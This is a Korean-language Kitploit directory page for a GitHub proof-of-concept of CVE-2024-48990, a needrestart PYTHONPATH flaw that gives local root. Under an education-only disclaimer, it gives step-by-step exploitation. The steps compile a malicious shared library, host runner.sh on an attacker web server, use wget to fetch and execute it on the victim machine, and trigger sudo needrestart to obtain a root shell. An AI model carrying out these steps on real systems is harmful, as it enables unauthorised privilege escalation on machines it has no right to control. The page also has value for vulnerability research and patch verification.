Skip to content
KitploitKITPLOIT
도구블로그
제출
도구블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
CVE-2024-48990 — CVE-2024-48990에 관한 PoC입니다. Qualys는 needrestart 3.8 이전 버전에서 로컬 공격자가 제어하는 PYTHONPATH 환경 변수를 이용해 needrestart가 Python 인터프리터를 실행하도록 속임으로써 루트 권한으로 임의 코드를 실행할 수 있음을 발견했습니다. (NIST) | Kitploit
도구/GitHubGitHub/grecosamuel/cve-2024-48990
Privilege EscalationVulnerability AnalysisExploitationPenetration TestingLearning & Education
GitHubgrecosamuel/cve-2024-48990

CVE-2024-48990

CVE-2024-48990에 관한 PoC입니다. Qualys는 needrestart 3.8 이전 버전에서 로컬 공격자가 제어하는 PYTHONPATH 환경 변수를 이용해 needrestart가 Python 인터프리터를 실행하도록 속임으로써 루트 권한으로 임의 코드를 실행할 수 있음을 발견했습니다. (NIST)

저장소 보기
8개월 전아직 검토되지 않음

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유

CVE-2024-48990

[!WARNING] 이 파일과 정보는 교육 목적으로만 제공됩니다. 저자는 어떠한 악의적인 행위에 대해서도 책임을 지지 않습니다. 제공되는 모든 정보는 어떠한 종류의 범죄나 악용을 선동하기 위한 것이 아닙니다.

설명

Qualys는 needrestart 3.8 이전 버전에서 로컬 공격자가 공격자가 제어하는 PYTHONPATH 환경 변수로 Python 인터프리터를 실행하도록 needrestart를 속여 루트 권한으로 임의 코드를 실행할 수 있음을 발견했습니다. 공식 세부 정보는 NIST에서 확인하세요.

PoC

  1. git에서 저장소를 다운로드합니다.

git clone https://github.com/grecosamuel/CVE-2024-48990.git

  1. 유효한 ELF 라이브러리를 생성하기 위해 exploit.c 라이브러리를 컴파일하고 __init__.so로 이름을 지정합니다.

gcc -shared -fPIC -o __init__.so exploit.c

  1. runner.sh의 7번째 줄과 10번째 줄에 있는 <IP> 및 **<PORT>**를 자신의 웹 서버 IP와 PORT로 변경합니다.
  2. 웹 서버를 시작합니다.

python3 -m http.server

  1. 피해자 머신에 runner를 다운로드합니다.

wget http://IP:PORT/runner.sh

  1. runner에 실행 권한을 설정합니다.

chmod +x runner.sh

  1. 스크립트를 실행합니다.

./runner.sh

  1. sudo 권한으로 needrestart를 실행합니다.

sudo needrestart

[*] CVE module created가 표시되면 CTRL+C를 눌러 프로세스를 중지하고 셸을 획득하세요!

도구 다운로드